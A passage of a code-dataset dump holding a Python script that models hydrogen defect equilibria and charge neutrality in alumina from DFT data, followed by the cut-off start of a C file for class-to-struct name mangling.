logp[0,:],logh[:,0],color='#66a61e',marker='>',label='h')\nplt.plot(logp[0,:],loge[:,0],color='#e6ab02',marker='<',label='e')\npylab.legend(loc='upper left')\npylab.savefig('native_1100K.png')\n" }, { "alpha_fraction": 0.5380898714065552, "alphanum_fraction": 0.6023481488227844, "avg_line_length": 48.990970611572266, "blob_id": "62c8d6bfdca96111df0fac3adeb24bc645df9ac0", "content_id": "c471c257bec47cd85050e7ce7a8b06fb46ef66ee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 22145, "license_type": "no_license", "max_line_length": 139, "num_lines": 443, "path": "/hydrogen defect equilibria/KVD_hydrogen_defect_equilibria.py", "repo_name": "vrindaasomjit/Defect-equilibria", "src_encoding": "UTF-8", "text": "import numpy as np\nimport math as m\nimport matplotlib.pyplot as plt\nfrom mpmath import * # for adjusting precision\nimport pylab\n\"\"\"\n*****************TO FIND CONCENTRATION OF ELECTRONIC DEFECTS*******************\n\"\"\"\n\"\"\"\nTo find VBM and CBM row numbers\n\"\"\"\n# finds the VBM and returns its row number\ndef find_VBM(rows_DOS, E_VBM): \n for i in range(0, rows_DOS): \n if DOS[i,0] == E_VBM: #first column of DOS has the energy\n VBM_line = i\n return VBM_line\n# finds the CBM and returns its row number\ndef find_CBM(rows_DOS, E_CBM): \n for i in range(0, rows_DOS): \n if DOS[i,0] == E_CBM: #first column of DOS has the energy\n CBM_line = i\n return CBM_line\n\n\"\"\"\nTrapezoidal method to find concentration of electronic defects by using the Fermi-Dirac distribution\nand integrating over density of states\nEf is calculated assuming E_VBM is the reference level, therefore E_VBM term included in the F-D distribution\n\"\"\"\n# returns the concentration of valence band holes when Fermi level=Ef\ndef trapz_holes(VBM_line, DOS, Ef, E_VBM): \n conc_holes = 0\n func = np.empty((VBM_line+1, 1), dtype=float) \n for i in range(0, VBM_line+1): \n func[i] = ((DOS[i,1] + DOS[i,2]) * m.exp(-(Ef + E_VBM - DOS[i,0])/(k * T)))/(1 + m.exp(-(Ef + E_VBM - DOS[i,0])/(k * T)))\n for i in range(0, VBM_line): \n conc_holes = conc_holes + ((DOS[i+1,0] - DOS[i,0]) * (func[i+1] + func[i])) #trapezoidal method\n conc_holes = conc_holes/2\n return conc_holes\n# returns the concentration of conduction band electrons when Fermi level=Ef\ndef trapz_electrons(rows_DOS, CBM_line, DOS, Ef, E_VBM): \n CB = np.empty((rows_DOS - CBM_line, 5),dtype=float)\n conc_electrons = 0\n CB = DOS[CBM_line:(rows_DOS), 0:6]\n func = np.empty((CB[:,0].size, 1), dtype=float)\n for i in range(0, CB[:,0].size): \n func[i] = (CB[i,1] + CB[i,2])/(1 + m.exp((CB[i,0] - Ef - E_VBM)/(k * T)))\n for i in range(0, CB[:,0].size-1): \n conc_electrons = conc_electrons + ((CB[i+1,0] - CB[i,0]) * (func[i+1] + func[i])) #trapezoidal method\n conc_electrons = conc_electrons/2\n return conc_electrons\n\"\"\"\n****************TO FIND DEFECT CONCENTRATIONS AT A GIVEN pH2*******************\n\"\"\"\n\"\"\"\nTo find chemical potentials\n\"\"\"\n# over pH2=1e-15 to 1 atm\n# including even lower values of pH2 will not make a difference, since T is so low\ndef H_chempot(lim, DFTE_H2, u0_H2, k, T, p0):\n pH2 = np.empty((lim,1),dtype=float) \n u_H = np.empty((lim,1),dtype=float) \n for i in range(0,lim): \n pH2[i] = m.pow(10,-(lim-1-i))\n u_H[i] = (1/2) * (DFTE_H2 + u0_H2 + (k * T * m.log(pH2[i]/p0))) \n return u_H\n\"\"\"\nTo find defect formation energies at a given pH2\n\"\"\"\n# formation E of isolated H defects; order Hi-1,Hi0,Hi+1\ndef formn_E(KV_Hi, E_perf, u_H, E_VBM, Ef):\n delE=np.empty((3,1),dtype=float) \n for i in range(0,3): \n delE[i]=KV_Hi[i,5] - E_perf - (KV_Hi[i,4]*u_H) + (KV_Hi[i,1] * (E_VBM+Ef)) + KV_Hi[i,7] \n return delE\n# reading fixed native defect concentrations, at each charge state\ndef conc_VO_fix(fixednative):\n VO_fix = fixednative[0:3,[5]] # q=0,1,2\n return VO_fix\ndef conc_VAl_fix(fixednative):\n VAl_fix = fixednative[3:7,[5]] # q=0,-1,-2,-3\n return VAl_fix\ndef conc_IO_fix(fixednative):\n IO = fixednative[7:10,[5]] # q=0,-1,-2\n return IO\ndef conc_IAl_fix(fixednative):\n IAl = fixednative[10:14,[5]] # q=0,1,2,3\n return IAl\n# calculating concentrations of isolated H defects using Boltzmann approx.\ndef conc_IH_eq(KV_Hi, delE, k, T):\n nD = KV_Hi[0:3,[6]] #N_site*N_config\n IH_eq = np.empty((3,1),dtype=float)\n for i in range(0,3):\n IH_eq[i] = nD[i] * np.exp(-delE[i]/(k * T)) # q=-1,0,1\n return IH_eq \n# calculating concentrations of H defect complexes from fixed native defect conc\n# and equilibrium isolated H defect conc\n# only those complexes w/ positive Eb and realizable charge considered\n# Supplementary Info has detailed derivation\ndef conc_VOH(delE, BE, fixednative, KV_Hi, VO_fix, k, T):\n IH_eq = conc_IH_eq(KV_Hi, delE, k, T) #3x1 q=-1,0,1\n VOH = np.empty((2,1),dtype=float) #q=0,1\n Eb = BE[0:2,[11]] #0,1\n Nconf_VOH = BE[0:2,[10]] #0,1\n Nconf_VO = fixednative[0:3,[4]] #q=0,1,2\n nD_Hi = KV_Hi[0:3,[6]] #-1,0,1\n # first calculating all the configuration-related prefactors\n X0 = Nconf_VOH[0]/(Nconf_VO[1] * nD_Hi[0]) #VOH0=VO+1,Hi-1\n X1 = Nconf_VOH[1]/(Nconf_VO[0] * nD_Hi[2]) #VOH+1=VO0,Hi+1\n IH_eq0 = IH_eq[0]; IH_eq2 = IH_eq[2]; Eb0 = Eb[0]; Eb1 = Eb[1]\n mp.dps = 250\n IH_eq0 = mpf(IH_eq0[0]); IH_eq2 = mpf(IH_eq2[0]); Eb0 = mpf(Eb0[0]); Eb1 = mpf(Eb1[0]);\n VOH[0] = (VO_fix[1] * IH_eq0)/(IH_eq0 + ((1/X0) * m.exp(-Eb0/(k * T)))) #VOH0=VO+1,Hi-1\n VOH[1] = (VO_fix[0] * IH_eq2)/(IH_eq2 + ((1/X1) * m.exp(-Eb1/(k * T)))) #VOHp1=VO0,Hi+1\n return VOH\ndef conc_VAlH(delE, BE, fixednative, KV_Hi, VAl_fix, k, T):\n IH_eq = conc_IH_eq(KV_Hi, delE, k, T) #3x1 q=-1,0,1\n VAlH = np.empty((9,1),dtype=float) #q=-3,-2,-1,0,1; -1,0,1,2->VAlxH\n Eb = BE[2:11,[11]] #q=-3,-2,-1,0,1; -1,0,1,2->VAlxH\n Nconf_VAlH = BE[2:11,[10]] #q=-3,-2,-1,0,1; -1,0,1,2->VAlxH\n Nconf_VAl = fixednative[3:7,[4]] #q=0,-1,-2,-3\n nD_Hi = KV_Hi[0:3,[6]] #q=-1,0,+1\n # first calculating all the configuration-related prefactors\n X0 = Nconf_VAlH[0]/(Nconf_VAl[2] * nD_Hi[0]) #VAlHm3=VAl-2,Hi-1\n X1 = Nconf_VAlH[1]/(Nconf_VAl[3] * nD_Hi[2]) #VAlHm2=VAl-3,Hi+1\n X2 = Nconf_VAlH[2]/(Nconf_VAl[2] * nD_Hi[2]) #VAlHm1=VAl-2,Hi+1\n X3 = Nconf_VAlH[3]/(Nconf_VAl[1] * nD_Hi[2]) #VAlHm0=VAl-1,Hi+1\n X4 = Nconf_VAlH[4]/(Nconf_VAl[0] * nD_Hi[2]) #VAlHp1=VAl0,Hi+1 \n X5 = Nconf_VAlH[5]/(Nconf_VAl[3] * (nD_Hi[2] ** 2)) #VAl2Hm1=VAl-3,2*Hi+1\n X6 = Nconf_VAlH[6]/(Nconf_VAl[3] * (nD_Hi[2] ** 3)) #VAl3Hx=VAl-3,3*Hi+1\n X7 = Nconf_VAlH[7]/(Nconf_VAl[3] * (nD_Hi[2] ** 4)) #VAl4Hp1=VAl-3,4*Hi+1\n X8 = Nconf_VAlH[8]/(Nconf_VAl[3] * (nD_Hi[2] ** 5)) #VAl5Hp2=VAl-3,5*Hi+1\n # calculating the sum of NVAlHm2,NVAl2Hm1,NVAl3Hx,NVAl4Hp1,NVAl5Hp2 \n mult1 = IH_eq[2] * X1 * m.exp(Eb[1]/(k*T))\n mult5 = (IH_eq[2] ** 2) * X5 * m.exp(Eb[5]/(k * T))\n mult6 = (IH_eq[2] ** 3) * X6 * m.exp(Eb[6]/(k * T))\n mult7 = (IH_eq[2] ** 4) * X7 * m.exp(Eb[7]/(k * T))\n mult8 = (IH_eq[2] ** 5) * X8 * m.exp(Eb[8]/(k * T))\n mp.dps = 250 #setting precision to 250 decimal points\n mult1 = mpf(mult1[0]); mult5 = mpf(mult5[0]); mult6 = mpf(mult6[0])\n mult7 = mpf(mult7[0]); mult8 = mpf(mult8[0]) #changing the precision\n summed=VAl_fix[3] * (mult1 + mult5 + mult6 + mult7 + mult8)/(1 + (mult1 + mult5 + mult6 + mult7 + mult8))\n # finding concentrations of VAlHm2,VAl2Hm1,VAl3Hx,VAl4Hp1,VAl5Hp2 analytically\n VAlH[1] = (VAl_fix[3] - summed) * IH_eq[2] * X1 * m.exp(Eb[1]/(k * T)) #VAlHm2=VAl-3,Hi+1\n VAlH[5] = (VAl_fix[3] - summed) * (IH_eq[2] ** 2) * X5 * m.exp(Eb[5]/(k * T)) #VAl2Hm1=VAl-3,2*Hi+1\n VAlH[6] = (VAl_fix[3] - summed) * (IH_eq[2] ** 3) * X6 * m.exp(Eb[6]/(k * T)) #VAl3Hx=VAl-3,3*Hi+1\n VAlH[7] = (VAl_fix[3] - summed) * (IH_eq[2] ** 4) * X7 * m.exp(Eb[7]/(k * T)) #VAl4Hp1=VAl-3,4*Hi+1\n VAlH[8] = (VAl_fix[3] - summed) * (IH_eq[2] ** 5) * X8 * m.exp(Eb[8]/(k * T)) #VAl5Hp2=VAl-3,5*Hi+1\n # next, defect complexes whose VAlq is not shared\n IH_eq2 = IH_eq[2]; Eb3 = Eb[3]; Eb4 = Eb[4]\n IH_eq2 = mpf(IH_eq2[0]); Eb3 = mpf(Eb3[0]); Eb4 = mpf(Eb4[0])\n VAlH[3] = (VAl_fix[1] * IH_eq2)/(IH_eq2 + ((1/X3) * m.exp(-Eb3/(k * T)))) #VAlH0=VAl-1,Hi+1\n VAlH[4] = (VAl_fix[0] * IH_eq2)/(IH_eq2 + ((1/X4) * m.exp(-Eb4/(k * T)))) #VAlHp1=VAl0,Hi+1 \n # calculating the sum of NVAlHm3,NVAlHm1 \n mult0 = IH_eq[0] * X0 * m.exp(Eb[0]/(k * T))\n mult2 = IH_eq[2] * X2 * m.exp(Eb[2]/(k * T))\n mult0 = mpf(mult0[0]); mult2 = mpf(mult2[0])\n summed2 = VAl_fix[2] * (mult0 + mult2)/(1 + (mult0 + mult2))\n # finding concentrations of VAlHm3,VAlHm1 analytically\n VAlH[0] = (VAl_fix[2] - summed2) * IH_eq[0] * X0 * m.exp(Eb[0]/(k * T)) #VAlHm3=VAl-2,Hi-1\n VAlH[2] = (VAl_fix[2] - summed2) * IH_eq[2] * X2 * m.exp(Eb[2]/(k * T)) #VAlHm1=VAl-2,Hi+1\n return VAlH\n\"\"\"\n**************************BISECTION METHOD*************************************\n\"\"\"\ndef samesign(fa,fb):\n return fa * fb > 0\n# calculates charge density at each u_H and fixed Ef\ndef neut_fn(VBM_line, DOS, Ef, E_VBM, rows_DOS, CBM_line, KV_Hi, E_perf, u_H, k, T, fixednative, KV_iso, KV_complex):\n conc_holes = trapz_holes(VBM_line, DOS, Ef, E_VBM) \n conc_electrons = trapz_electrons(rows_DOS, CBM_line, DOS, Ef, E_VBM) \n delE = formn_E(KV_Hi, E_perf, u_H, E_VBM, Ef) #3x1\n # fixed concentrations of native defects\n VO_fix = conc_VO_fix(fixednative) #3x1\n VAl_fix = conc_VAl_fix(fixednative) #4x1\n IO_fix = conc_IO_fix(fixednative) #3x1\n IAl_fix = conc_IAl_fix(fixednative) #4x1\n # equilibrium concentrations of H defects\n IH_eq = conc_IH_eq(KV_Hi, delE, k, T) #3x1\n # concentrations of H complexes\n VOH = conc_VOH(delE, BE, fixednative, KV_Hi, VO_fix, k, T) #2x1\n VAlH = conc_VAlH(delE, BE, fixednative, KV_Hi, VAl_fix, k, T) #9x1\n # charges\n q_VO = KV_iso[0:3,1] #3x1\n q_VAl = KV_iso[3:7,1] #4x1\n q_IO = KV_iso[7:10,1] #3x1\n q_IAl = KV_iso[10:14,1] #4x1\n q_IH = KV_iso[14:17,1] #3x1\n q_VOH = KV_complex[1:3,1] #2x1 #0,1\n q_VAlH = KV_complex[6:15,1] #9x1 #-3,-2,-1,0,1; -1,0,1,2->VAlxH\n VO = np.empty((3,1),dtype=float) #3x1\n VAl = np.empty((4,1),dtype=float) #4x1\n IO = np.empty((3,1),dtype=float) #3x1\n IAl = np.empty((4,1),dtype=float) #4x1 \n qVO = np.empty((3,1),dtype=float) #3x1\n qVAl = np.empty((4,1),dtype=float) #4x1\n qIO = np.empty((3,1),dtype=float) #3x1\n qIAl = np.empty((4,1),dtype=float) #4x1\n qIH_eq = np.empty((3,1),dtype=float) #3x1\n qVOH = np.empty((2,1),dtype=float) #2x1\n qVAlH = np.empty((9,1),dtype=float) #9x1\n # current concentrations; ordering: 0,1,2; 0,-1,-2,-3\n VO[0] = VO_fix[0] - VOH[1]\n VO[1] = VO_fix[1] - VOH[0]\n VO[2] = VO_fix[2]\n VAl[0] = VAl_fix[0] - VAlH[4]\n VAl[1] = VAl_fix[1] - VAlH[3]\n VAl[2] = VAl_fix[2] - VAlH[2] - VAlH[0]\n VAl[3] = VAl_fix[3] - VAlH[1] - VAlH[5] - VAlH[6] - VAlH[7] - VAlH[8] \n IO = IO_fix\n IAl = IAl_fix\n # charge*respective conc\n for i in range(0,3):\n qVO[i] = q_VO[i] * VO[i]\n for i in range(0,4):\n qVAl[i] = q_VAl[i] * VAl[i]\n for i in range(0,3):\n qIO[i] = q_IO[i] * IO[i]\n for i in range(0,4):\n qIAl[i] = q_IAl[i] * IAl[i]\n for i in range(0,3):\n qIH_eq[i] = q_IH[i] * IH_eq[i]\n for i in range(0,2):\n qVOH[i] = q_VOH[i] * VOH[i] \n for i in range(0,9):\n qVAlH[i] = q_VAlH[i] * VAlH[i]\n sum_qD = sum(qVO) + sum(qVAl) + sum(qIO) + sum(qIAl) + sum(qIH_eq) + sum(qVOH) + sum(qVAlH)\n f = sum_qD + conc_holes - conc_electrons \n return f\n# to solve for Ef that achieves charge neutrality\ndef bisection(VBM_line, DOS, Efa, Efb, E_VBM, rows_DOS, CBM_line, KV_Hi, E_perf, u_H, k, T, fixednative, KV_iso, KV_complex):\n fa = neut_fn(VBM_line, DOS, Efa, E_VBM, rows_DOS, CBM_line, KV_Hi, E_perf, u_H, k, T, fixednative, KV_iso, KV_complex)\n #print(fa)\n fb = neut_fn(VBM_line, DOS, Efb, E_VBM, rows_DOS, CBM_line, KV_Hi, E_perf, u_H, k, T, fixednative, KV_iso, KV_complex)\n #print(fb)\n assert not samesign(fa,fb)\n while Efb - Efa > 1e-14:\n Efc = (Efa + Efb)/2\n fc = neut_fn(VBM_line, DOS, Efc, E_VBM, rows_DOS, CBM_line, KV_Hi, E_perf, u_H, k, T, fixednative, KV_iso, KV_complex)\n if samesign(fa,fc):\n Efa = Efc\n elif samesign(fb,fc):\n Efb = Efc\n return Efc\n# evaluates everything across the pH2 range\ndef final_f_Ef_conc(lim, VBM_line, DOS, Efa, Efb, E_VBM, rows_DOS, CBM_line, KV_Hi, E_perf, u_H, k, T, fixednative, KV_iso, KV_complex):\n VO_fix = conc_VO_fix(fixednative) #3x1\n VAl_fix = conc_VAl_fix(fixednative) #4x1\n IO_fix = conc_IO_fix(fixednative) #3x1\n IAl_fix = conc_IAl_fix(fixednative) #3x1\n f = np.empty((lim,1),dtype=float) #to check value of neutrality equation using final Ef\n Ef = np.empty((lim,1),dtype=float)\n delE = np.empty((3,lim),dtype=float)\n final_h = np.empty((lim,1),dtype=float)\n final_e = np.empty((lim,1),dtype=float)\n final_VO = np.empty((3,lim),dtype=float) #current VO\n final_VAl = np.empty((4,lim),dtype=float) #current VAl\n final_IO = np.empty((3,lim),dtype=float)\n final_IAl = np.empty((4,lim),dtype=float)\n final_IH = np.empty((3,lim),dtype=float)\n final_VOH = np.empty((2,lim),dtype=float) \n final_VAlH = np.empty((9,lim),dtype=float)\n for i in range(0,lim):\n #print(u_H[i])\n Ef[i] = bisection(VBM_line, DOS, Efa, Efb, E_VBM, rows_DOS, CBM_line, KV_Hi, E_perf, u_H[i], k, T, fixednative, KV_iso, KV_complex)\n #print(Ef[i])\n delE[:,[i]] = formn_E(KV_Hi, E_perf, u_H[i], E_VBM, Ef[i])\n f[i] = neut_fn(VBM_line, DOS, Ef[i], E_VBM, rows_DOS, CBM_line, KV_Hi, E_perf, u_H[i], k, T, fixednative, KV_iso, KV_complex)\n final_h[i] = trapz_holes(VBM_line, DOS, Ef[i], E_VBM)\n final_e[i] = trapz_electrons(rows_DOS, CBM_line, DOS, Ef[i], E_VBM)\n final_IH[:,[i]] = conc_IH_eq(KV_Hi, delE[:,[i]], k, T)\n final_VAlH[:,[i]] = conc_VAlH(delE[:,[i]], BE, fixednative, KV_Hi, VAl_fix, k, T)\n final_VOH[:,[i]] = conc_VOH(delE[:,[i]], BE, fixednative, KV_Hi, VO_fix, k, T)\n final_VO[0,[i]] = VO_fix[0] - final_VOH[1,i]\n final_VO[1,[i]] = VO_fix[1] - final_VOH[0,i]\n final_VO[2,[i]] = VO_fix[2]\n final_VAl[0,[i]] = VAl_fix[0] - final_VAlH[4,i]\n final_VAl[1,[i]] = VAl_fix[1] - final_VAlH[3,i]\n final_VAl[2,[i]] = VAl_fix[2] - final_VAlH[2,i] - final_VAlH[0,i]\n final_VAl[3,[i]] = VAl_fix[3] - final_VAlH[1,i] - final_VAlH[5,i] - final_VAlH[6,i] - final_VAlH[7,i] - final_VAlH[8,i]\n final_IO[:,[i]] = IO_fix\n final_IAl[:,[i]] = IAl_fix\n return (Ef,delE,f,final_h,final_e,final_IH,final_VAlH,final_VOH,final_VO,final_VAl,final_IO,final_IAl)\n\"\"\"\n****************************MAIN BODY******************************************\n\"\"\"\nDOS = np.loadtxt(\"dosperfect.txt\") # DOS from VASP\nDOS[:,1] = DOS[:,1]/24 # spin-up DOS per formula unit of Al2O3\nDOS[:,2] = DOS[:,2]/24 # spin-down DOS per formula unit of Al2O3\n# n,charge,num_O,num_Al,num_H,E_defect,NsiteNconfig,E_MP\nKV_Hi = np.loadtxt(\"onlyHi.txt\",skiprows=1) # 3x8, only Hi DFT details\n# n,charge,num_O,num_Al,num_H,num_Mg,num_Fe,num_Ti,num_Cr,num_Si,E_defect,num_site,E_MP\nKV_iso = np.loadtxt(\"isolated.txt\",skiprows=1) # 30x13, all defect details\n# n,charge,num_O,num_Al,num_H,num_Mg,num_Fe,num_Ti,num_Cr,num_Si,E_defect,num_site,E_MP\nKV_complex = np.loadtxt(\"complex.txt\",skiprows=1) # 36x13, all defect details\n# n,charge,num_O,num_Al,Nconf,concentration\nfixednative = np.loadtxt(\"fixed_native_conc.txt\",skiprows=1) # 14x6, conc of native defects from 1100K\n# n,charge,num_O,num_Al,num_H,num_Mg,num_Fe,num_Ti,num_Cr,num_Si,Nconf,BE\nBE = np.loadtxt(\"binding_energies.txt\",skiprows=1) # binding energies 11x12\n# defining constants\nk = 8.6173303e-05 # Boltzmann constant in eV\nE_VBM = 5.795 # Valence band maximum in eV\nE_CBM = 11.638 # Conduction band minimum in eV\nrows_DOS = len(DOS) # number of rows in the array DOS\n# Ef ranges from 0 to Eg in eV\nEfa=0\nEfb=5.84\nVBM_line = find_VBM(rows_DOS, E_VBM)\nCBM_line = find_CBM(rows_DOS, E_CBM)\n# defining constants to calculate chemical potentials \nDFTE_H2 = -6.771 # DFT energy of H2 molecule in eV\nE_perf = -897.74454 # DFT energy in eV of perfect supercell of Al2O3\nu0_H2 = -0.31856664 # at 300 K (Temperature correction to u_H)\np0 = 1 # standard pressure in atm\nT = 300 # K\nlim = 16\nu_H = H_chempot(lim, DFTE_H2, u0_H2, k, T, p0)\n# calculating all final defect concentrations at all pH2 by using bisection method to solve\n# charge-neutrality equation \nfunc = final_f_Ef_conc(lim, VBM_line, DOS, Efa, Efb, E_VBM, rows_DOS, CBM_line, KV_Hi, E_perf, u_H, k, T, fixednative, KV_iso, KV_complex)\nEf = func[0]\ndelE = func[1]\nf = func[2]\nfinalh = func[3]\nfinale=func[4]\nfinalIH=func[5]\nfinalVAlH=func[6]\nfinalVOH=func[7]\nfinalVO=func[8]\nfinalVAl=func[9]\nfinalIO=func[10]\nfinalIAl=func[11]\np=np.array([[1e-15,1e-14,1e-13,1e-12,1e-11,1e-10,1e-09,1e-08,1e-07,1e-06,\n 1e-05,1e-04,1e-03,1e-02,1e-01,1]])\nlogp=np.log10(p)\nlogh=np.log10(finalh)\nloge=np.log10(finale)\nlogVAl=np.log10(finalVAl)\nlogIH=np.log10(finalIH)\nlogVAlH=np.log10(finalVAlH)\nlogVOH=np.log10(finalVOH)\nlogVO=np.log10(finalVO)\nlogVAl=np.log10(finalVAl)\nlogIO=np.log10(finalIO)\nlogIAl=np.log10(finalIAl)\n#plt.figure(figsize=(3.84,2.95))\naxes=plt.gca()\naxes.set_xlim([-15,0])\naxes.set_ylim([-18,-4])\nfont = {'fontname':'Times New Roman','fontsize':7}\nplt.xlabel('logpH2 (atm)',**font)\nplt.ylabel('log[D] per f.u. Al2O3',**font)\nplt.plot(logp[0,:],logVO[0,:],color='#e41a1c',marker='.',label='VOx')\nplt.plot(logp[0,:],logVO[1,:],color='#e41a1c',marker='*',label='VO+1')\nplt.plot(logp[0,:],logVO[2,:],color='#e41a1c',marker='p',label='VO+2')\nplt.plot(logp[0,:],logVAl[0,:],color='#377eb8',marker='P',label='VAlx')\nplt.plot(logp[0,:],logVAl[1,:],color='#377eb8',marker='+',label='VAl-1')\nplt.plot(logp[0,:],logVAl[2,:],color='#377eb8',marker='x',label='VAl-2')\nplt.plot(logp[0,:],logVAl[3,:],color='#377eb8',marker='o',label='VAl-3')\nplt.plot(logp[0,:],logIO[0,:],color='#4daf4a',marker='X',label='IOx')\nplt.plot(logp[0,:],logIO[1,:],color='#4daf4a',marker='h',label='IO-1')\nplt.plot(logp[0,:],logIO[2,:],color='#4daf4a',marker='H',label='IO-2')\nplt.plot(logp[0,:],logIAl[0,:],color='#984ea3',marker='d',label='IAlx')\nplt.plot(logp[0,:],logIAl[1,:],color='#984ea3',marker='D',label='IAl+1')\nplt.plot(logp[0,:],logIAl[2,:],color='#984ea3',marker='s',label='IAl+2')\nplt.plot(logp[0,:],logIAl[3,:],color='#984ea3',marker='^',label='IAl+3')\nplt.plot(logp[0,:],logh[:,0],color='#ff7f00',marker='>',label='h')\nplt.plot(logp[0,:],loge[:,0],color='#ffff33',marker='<',label='e')\nplt.plot(logp[0,:],logIH[0,:],color='#a65628',marker='.',label='IH-1')\nplt.plot(logp[0,:],logIH[1,:],color='#a65628',marker='*',label='IHx')\nplt.plot(logp[0,:],logIH[2,:],color='#a65628',marker='p',label='IH+1')\nplt.plot(logp[0,:],logVOH[0,:],color='#f781bf',marker='P',label='VOHx')\nplt.plot(logp[0,:],logVOH[1,:],color='#f781bf',marker='+',label='VOH+1')\nplt.plot(logp[0,:],logVAlH[0,:],color='#999999',marker='h',label='VAlH-3')\nplt.plot(logp[0,:],logVAlH[1,:],color='#999999',marker='H',label='VAlH-2')\nplt.plot(logp[0,:],logVAlH[2,:],color='#999999',marker='d',label='VAlH-1')\nplt.plot(logp[0,:],logVAlH[3,:],color='#999999',marker='D',label='VAlHx')\nplt.plot(logp[0,:],logVAlH[4,:],color='#999999',marker='s',label='VAlH+1')\nplt.plot(logp[0,:],logVAlH[5,:],color='#984ea3',marker='H',label='VAl2H-1')\nplt.plot(logp[0,:],logVAlH[6,:],color='#ff7f00',marker='^',label='VAl3Hx')\nplt.plot(logp[0,:],logVAlH[7,:],color='#ff7f00',marker='x',label='VAl4H+1')\nplt.plot(logp[0,:],logVAlH[8,:],color='#984ea3',marker='+',label='VAl5H+2')\nplt.legend(loc='upper left')\npylab.savefig('with_hydrogen_300K.png')\n\n'''\n\nplt.plot(logp[0,:],logVAlH[6,:],color='#7570b3',label='$[V_{Al}-3H]^{x}$',linewidth=2)\nplt.plot(logp[0,:],logVAlH[7,:],color='#000000',marker='>',markersize=5,label='$[V_{Al}-4H]^{.}')\nplt.plot(logp[0,:],logVAlH[2,:],color='#e6ab02',label='$[V_{Al}-H]^{,}$',linewidth=2)\nplt.plot(logp[0,:],logIH[2,:],color='#e41a1c',label='$H_i^.\"\\u0387\"$',linewidth=2)\nplt.plot(logp[0,:],logVAlH[3,:],color='#a6761d',label='$[V_{Al}-H]^{x}$',linewidth=2)\nax=plt.subplot(111)\nax.tick_params(axis='both', which='major', labelsize=7)\npylab.savefig('undoped_H_300K.png')\nconcH=sum(finalIH[:,(lim-1)])+sum(finalVOH[:,(lim-1)])+sum(finalVAlH[:,(lim-1)])\nlogconcH=np.log10(concH)\n\"\"\"\nplt.plot(logp[0,:],logVO[0,:],color='#e41a1c',marker='.',label='VOx')\nplt.plot(logp[0,:],logVO[1,:],color='#e41a1c',marker='*',label='VO+1')\nplt.plot(logp[0,:],logVO[2,:],color='#e41a1c',marker='p',label='VO+2')\nplt.plot(logp[0,:],logVAl[0,:],color='#377eb8',marker='P',label='VAlx')\nplt.plot(logp[0,:],logVAl[1,:],color='#377eb8',marker='+',label='VAl-1')\nplt.plot(logp[0,:],logVAl[2,:],color='#377eb8',marker='x',label='VAl-2')\nplt.plot(logp[0,:],logVAl[3,:],color='#377eb8',marker='o',label='VAl-3')\nplt.plot(logp[0,:],logIO[0,:],color='#4daf4a',marker='X',label='IOx')\nplt.plot(logp[0,:],logIO[1,:],color='#4daf4a',marker='h',label='IO-1')\nplt.plot(logp[0,:],logIO[2,:],color='#4daf4a',marker='H',label='IO-2')\nplt.plot(logp[0,:],logIAl[0,:],color='#984ea3',marker='d',label='IAlx')\nplt.plot(logp[0,:],logIAl[1,:],color='#984ea3',marker='D',label='IAl+1')\nplt.plot(logp[0,:],logIAl[2,:],color='#984ea3',marker='s',label='IAl+2')\nplt.plot(logp[0,:],logIAl[3,:],color='#984ea3',marker='^',label='IAl+3')\nplt.plot(logp[0,:],logh[:,0],color='#ff7f00',marker='>',label='h')\nplt.plot(logp[0,:],loge[:,0],color='#ffff33',marker='<',label='e')\nplt.plot(logp[0,:],logIH[0,:],color='#a65628',marker='.',label='IH-1')\nplt.plot(logp[0,:],logIH[1,:],color='#a65628',marker='*',label='IHx')\nplt.plot(logp[0,:],logIH[2,:],color='#a65628',marker='p',label='IH+1')\nplt.plot(logp[0,:],logVOH[0,:],color='#f781bf',marker='P',label='VOHx')\nplt.plot(logp[0,:],logVOH[1,:],color='#f781bf',marker='+',label='VOH+1')\nplt.plot(logp[0,:],logVAlH[0,:],color='#999999',marker='h',label='VAlH-3')\nplt.plot(logp[0,:],logVAlH[1,:],color='#999999',marker='H',label='VAlH-2')\nplt.plot(logp[0,:],logVAlH[2,:],color='#999999',marker='d',label='VAlH-1')\nplt.plot(logp[0,:],logVAlH[3,:],color='#999999',marker='D',label='VAlHx')\nplt.plot(logp[0,:],logVAlH[4,:],color='#999999',marker='s',label='VAlH+1')\nplt.plot(logp[0,:],logVAlH[5,:],color='#984ea3',marker='H',label='VAl2H-1')\nplt.plot(logp[0,:],logVAlH[6,:],color='#ff7f00',marker='^',label='VAl3Hx')\nplt.plot(logp[0,:],logVAlH[7,:],color='#ff7f00',marker='x',label='VAl4H+1')\nplt.plot(logp[0,:],logVAlH[8,:],color='#984ea3',marker='+',label='VAl5H+2')\nplt.legend()\n\"\"\"\n\"\"\"\n#pylab.legend(loc='upper left')\n\n#ax=plt.subplot(111)\n\n# Shrink current axis by 20%\n#box = ax.get_position()\n#ax.set_position([box.x0, box.y0, box.width * 0.85, box.height])\n# Put a legend to the right of the current axis\n#ax.legend(loc='upper right',bbox_to_anchor=(1, 1))\n#ax.legend().draggable()\n\"\"\"\n'''" } ]
3
jsovernigo/cis2750-A4
https://github.com/jsovernigo/cis2750-A4
e4ea93c330ba68f8473d32a590b41add886cb4da
3b1fa5ac9b946deb44aeab30ab7d0867d84bf0a3
c14fd69e9bb5edc2a2dbef9f5e9ce98bd83a5989
refs/heads/master
2021-01-18T16:13:29.485393
2017-03-31T01:06:44
2017-03-31T01:06:44
86,729,026
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5739463567733765, "alphanum_fraction": 0.5857811570167542, "avg_line_length": 19.8614559173584, "blob_id": "7a1e5dcc8ad863cb3d07d3b7b0dfd1d37ce9e442", "content_id": "304af80d25563adbe6270bcfe635c08a40778bcb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 23490, "license_type": "no_license", "max_line_length": 128, "num_lines": 1126, "path": "/classToStruct.c", "repo_name": "jsovernigo/cis2750-A4", "src_encoding": "UTF-8", "text": "/**\n *\tJulian Sovernigo\n *\t0948924\n *\tCIS*2750_W17\n *\tgsoverni\n *\[email protected]\n *\n *\tThis file contains functions that are designed to operate on class-to-\n *\tstruct situations in a cc file, where the desided outcome is to produce\n *\ta working c file.\n *\n *\tThese functions aid in that transition.\n */\n#include \"classToStruct.h\"\n#include \"recognize.h\"\n#include \"parseFile.h\"\n#include <ctype.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n\nchar* mangle(char* className, char* functionName, char* args)\n{\n\tunsigned int i;\n\n\tint numberOfArgs;\n\tint finalLength;\n\tint carg;\n\tint record;\n\n\tchar* finalName;\n\tchar* 